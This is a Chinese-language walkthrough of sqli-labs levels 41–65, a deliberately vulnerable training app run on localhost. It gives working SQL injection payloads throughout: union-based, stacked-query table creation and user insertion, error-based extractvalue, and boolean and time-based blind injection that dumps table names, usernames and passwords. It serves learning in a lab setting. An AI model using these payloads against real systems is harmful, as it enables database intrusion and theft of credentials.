sqli-labs (41-65)
less-41
只有输入id=1才会出现回显,尝试输入 ?id=0 union select 1,1,1 成功回显
爆库:
id=0 union select 1,1,database()
爆表:
id=0 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='security'
爆列:
id=0 union select 1,1,group_concat(column_name) from information_schema.columns where table_name='users'
爆值:
id=0 union select 1,1,group_concat(username,password) from users
less-42
查看源码:
图片.png
Password变量在post过程中,没有通过mysql_real_escape_string()函数的处理。
用户名可以随意填写,
密码我们可以构造进行注入。
通过伪造表查看数据列名
在密码栏填写:
a';creat table less42 like users#
创建成功后发现,users表中数据列名为id,username,password
以此类推,只需插入数据(或者更新数据)即可
a';insert into users (username,password) values ('a','a')#
图片.png
less-43
先用同样的方法测试,就用less42的方法,
注入语句:a';creat table less43 like users#
图片.png
发现报错
根据报错提示,只需在less-42的基础上加一个括号,即:
a');creat table less43 like users#
以此类推,同less-42
less-44
同less-42,只不过没有报错回显,我们只能通过查看数据库来判断是否注入成功
通过测试,发现和less42一样。
less-45
集结了less-44和less-43,即报错不回显,测试方法同less-44,盲注,观察数据库,注入方法和less-43一样。
less-46
借鉴于博客
尝试?sort=1 desc或者asc,显示结果不同,则表明可以注入。
爆表:
http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))%20--+
图片.png
爆列:
http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)))--+
图片.png
爆值:
localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select group_concat(username,password) from users)))--+
图片.png
less-47
输入?sort=1,回显正常,输入?sort=1',报错
图片.png
根据报错提示,显示为单引号,故
爆表:
http://localhost/sqli-labs/Less-47/?sort=1%27%20and%20extractvalue(1,concat(0x7,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))--+
以此类推。
less-48
http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)
http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)
less-49
延时注入:
http://localhost/sqli-labs/Less-49/index.php?sort=1%27%20and%20(If(ascii(substr((select%20username%20from%20users%20where%20id=1),1,1))=115,0,sleep(5)))--+
或者如less-48
less-50
http://localhost/sqli-labs/Less-50/?sort=1;create%20table%20less50%20like%20users
less-51
http://localhost/sqli-labs/Less-51/?sort=1%27;create%20table%20less51%20like%20users--+
less-52
http://localhost/sqli-labs/Less-52/?sort=1;create%20table%20less52%20like%20users--+
less-53
?sort=1%27;create%20table%20less53%20like%20users–+
less-54
爆表:
http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+
爆列:
http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27gxdghjy72p%27--+
爆值:
http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(secret_X79M)%20from%20gxdghjy72p--+
less-55
多一个括号?id=0) 次数为14次
less-56
思路同上54 ,只不过多一个括号?id=0') 次数为14次
less-57
思路同上,只不过 id=”.$id.” 这里进行了双引号闭合
?id=-1”union select 1,1,group_concat(table_name) from information_schema.tables where table_schema=’challenges’%23
less-58
尝试了查询database() 不返回数据。
那就只能试试报错注入了
?id=0’union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
less-59
同上,只不过没有单引号
?id=0 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
less-60
同上,只不过多了双引号和括号?id=0”)
?id=0”) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
less-61
同上,只不过多了两个括号和一个双引号?id=0’))
?id=0’)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
less-62
union和报错注入失效
使用延时注入
?id=1')and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+
less-63
同上62,只不过是单引号
?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--++
正确时间短,错误时间长
less-64
同上63,只不过是双括号
?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短,错误时间长
less-65
同上,只不过?id=1”)
?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+